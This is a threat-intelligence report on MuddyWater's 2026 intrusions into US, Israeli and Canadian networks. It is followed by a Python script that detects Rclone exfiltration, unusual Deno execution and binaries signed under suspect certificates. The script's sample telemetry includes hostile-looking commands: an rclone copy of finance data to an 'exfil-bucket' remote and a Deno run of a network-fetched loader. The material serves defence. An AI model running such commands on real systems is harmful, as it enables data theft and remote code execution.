Full Report
MOIS-linked MuddyWater crew has a new, custom implant

An Iranian cyber crew believed to be part of the Iranian Ministry of Intelligence and Security (MOIS) has been embedded in multiple US companies' networks - including a bank, software firm, and airport, among others - since the beginning of February, with more activity in the days following the US and Israeli military strikes, according to security researchers.…
Analysis Summary
# Threat Actor: MuddyWater
## Attribution & Identity
* **Primary Name:** MuddyWater
* **Aliases:** Seedworm, Static Kitten
* **Associated Groups:** Iranian Ministry of Intelligence and Security (MOIS)
* **Attribution:** Formally attributed by the FBI, CISA, and the UK NCSC as a subordinate element of the Iranian MOIS.
## Activity Summary
Since early February 2026, MuddyWater has been embedded in several high-value U.S., Israeli, and Canadian networks. Activity surged following U.S. and Israeli military strikes. The campaign involved the deployment of two previously unknown backdoors and attempts to exfiltrate data, likely for intelligence gathering or prepositioning for future disruptive operations.
## Tactics, Techniques & Procedures
* **Initial Access:** Typically leverages spear-phishing or exploiting vulnerabilities in public-facing applications (though exact entry for this campaign is unconfirmed).
* **Persistence:** Use of custom-signed backdoors to maintain long-term access.
* **Execution:** Utilization of **Deno** (JavaScript/TypeScript runtime) to execute malware.
* **Data Exfiltration:** Usage of **Rclone** to move data to cloud storage.
* **Evasion:** Malware signed with legitimate-looking certificates (e.g., "Amy Cherne," "Donald Gay") to bypass security controls.
* **Surveillance:** Exploitation of internet-connected CCTV and security cameras for real-time intelligence and physical strike coordination (based on historical May 2025/June 2026 patterns).
**MITRE ATT&CK IDs mentioned/implied:**
* Exfiltration to Cloud Storage (T1537)
* Exploit Public-Facing Application (T1190)
* Code Signing (T1553.002)
## Targeting
* **Sectors:** Banking/Finance, Software Development, Aviation (Airports), Non-Governmental Organizations (NGOs), Defense, and Aerospace.
* **Geography:** United States, Israel, Canada, and the Middle East.
* **Victims:**
  * U.S. Bank
  * U.S. Airport
  * U.S. Software Firm (with defense/aerospace ties and Israeli presence)
  * Canadian Non-profit
  * U.S. Non-profit
  * Israeli infrastructure (primary target)
## Tools & Infrastructure
* **Dindoor:** A new backdoor using the Deno runtime for execution.
* **Fakeset:** A custom Python-based backdoor.
* **Stagecomp / Darkcomp:** Historic malware families linked via shared code-signing certificates.
* **Rclone:** Command-line program used to sync files to cloud storage.
* **Cloud Infrastructure:** Wasabi cloud storage bucket (used for exfiltration).
* **Certificates:** Signed under "Amy Cherne" and "Donald Gay."
## Implications
The actor’s presence in critical infrastructure (airports/banks) and defense-linked software firms provides a "dual-use" capability. While the current focus appears to be intelligence gathering, the established persistence allows for a rapid pivot to disruptive or destructive attacks (e.g., wiper malware or system outages) in response to escalating physical kinetic conflicts between the U.S., Israel, and Iran.
## Mitigations
* **Vulnerability Management:** Prioritize patching of all public-facing assets to prevent initial entry.
* **Egress Filtering:** Monitor for, and block, cloud synchronization tools such as Rclone transferring data to unapproved cloud storage providers (e.g., Wasabi).
* **Certificate Auditing:** Audit and monitor for unusual signed binaries, specifically certificates associated with "Amy Cherne" or "Donald Gay."
* **Runtime Monitoring:** Monitor for unusual executions of the Deno runtime or Python scripts on endpoints.
* **IoT Security:** Secure and segment internet-facing CCTV cameras and change default credentials to prevent surveillance exploitation.
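The egress-filtering, certificate-auditing and runtime-monitoring mitigations above all reduce to rules over endpoint process-creation telemetry. The following is an added example, not code from the original report or from the researchers it cites, showing one way to express those three rules as detection logic and run them over a handful of constructed process events. The signer names come from the report; the allowlisted rclone remote (`corp-backup`), the approved Deno directory, the hostnames and the command lines are assumptions invented for the example.

```python
from __future__ import annotations
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Certificate subject names the report lists as used to sign MuddyWater tooling.
SUSPECT_SIGNERS = {"amy cherne", "donald gay"}
# Assumptions for this example: the only sanctioned rclone remote name, and the
# directory from which sanctioned Deno scripts are allowed to run.
APPROVED_RCLONE_REMOTES = {"corp-backup"}
APPROVED_DENO_DIRS = {r"c:\program files\deno"}


@dataclass
class ProcessEvent:
    host: str
    image: str          # full path of the launched executable
    cmdline: str        # full command line as recorded by the EDR/Sysmon
    signer: str = ""    # subject of the Authenticode signer, empty if unsigned


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def _image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _image_dir(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def _rclone_remotes(cmdline: str) -> list[str]:
    """Return rclone remote names (the 'name' in 'name:bucket/path') present in a command line."""
    remotes = []
    for tok in cmdline.split():
        if "://" in tok or ":" not in tok:
            continue                      # URLs and plain arguments are not remotes
        name = tok.split(":", 1)[0].strip('"')
        # A single letter before ':' is a Windows drive (C:\...), not an rclone remote.
        if len(name) > 1 and name.replace("-", "").replace("_", "").isalnum():
            remotes.append(name.lower())
    return remotes


def check_rclone(ev: ProcessEvent) -> list[Finding]:
    """Egress rule: rclone pointed at a remote that is not on the allowlist."""
    if _image_name(ev.image) != "rclone.exe":
        return []
    bad = [r for r in _rclone_remotes(ev.cmdline) if r not in APPROVED_RCLONE_REMOTES]
    return [Finding("rclone-unapproved-remote", ev.host, f"remote(s) {bad}")] if bad else []


def check_deno(ev: ProcessEvent) -> list[Finding]:
    """Runtime rule: Deno launched from an unexpected path or running a network-fetched script."""
    if _image_name(ev.image) != "deno.exe":
        return []
    reasons = []
    if _image_dir(ev.image) not in APPROVED_DENO_DIRS:
        reasons.append(f"deno launched from {ev.image}")
    if any(t.startswith(("http://", "https://")) for t in ev.cmdline.split()):
        reasons.append("deno executing a script fetched over the network")
    return [Finding("deno-unusual-execution", ev.host, "; ".join(reasons))] if reasons else []


def check_signer(ev: ProcessEvent) -> list[Finding]:
    """Certificate rule: binary signed under one of the subject names from the report."""
    if ev.signer.strip().lower() in SUSPECT_SIGNERS:
        return [Finding("suspect-code-signer", ev.host, f"{ev.image} signed by '{ev.signer}'")]
    return []


def analyze(events: list[ProcessEvent]) -> list[Finding]:
    findings: list[Finding] = []
    for ev in events:
        for check in (check_rclone, check_deno, check_signer):
            findings.extend(check(ev))
    return findings


# Constructed sample telemetry for the example; not real events from the campaign.
SAMPLE_EVENTS = [
    ProcessEvent("fin-ws-07", r"C:\Users\jdoe\AppData\Local\Temp\rclone.exe",
                 r"rclone.exe copy C:\Finance\Reports wasabi:exfil-bucket/q1 -P"),
    ProcessEvent("bk-srv-02", r"C:\Tools\rclone\rclone.exe",
                 r"rclone.exe sync D:\Backups corp-backup:nightly"),
    ProcessEvent("dev-ws-11", r"C:\Users\jdoe\AppData\Local\Temp\deno.exe",
                 r"deno.exe run --allow-net --allow-read https://example.invalid/loader.ts"),
    ProcessEvent("dev-ws-11", r"C:\Program Files\deno\deno.exe",
                 r'deno.exe run "C:\Program Files\deno\scripts\lint.ts"'),
    ProcessEvent("ops-ws-03", r"C:\ProgramData\update\update.exe", "update.exe /silent",
                 signer="Amy Cherne"),
    ProcessEvent("ops-ws-03", r"C:\Windows\System32\notepad.exe", "notepad.exe",
                 signer="Microsoft Windows"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the sample events, the rules fire on the rclone copy to the `wasabi` remote, the Deno binary launched from a temp directory that pulls its script over HTTPS, and the binary signed under "Amy Cherne"; the sanctioned backup job, the Deno run from the approved directory and the Microsoft-signed binary produce nothing. In production the same three checks map directly onto Sysmon Event ID 1 or EDR process-start records, with the allowlists maintained as configuration rather than constants.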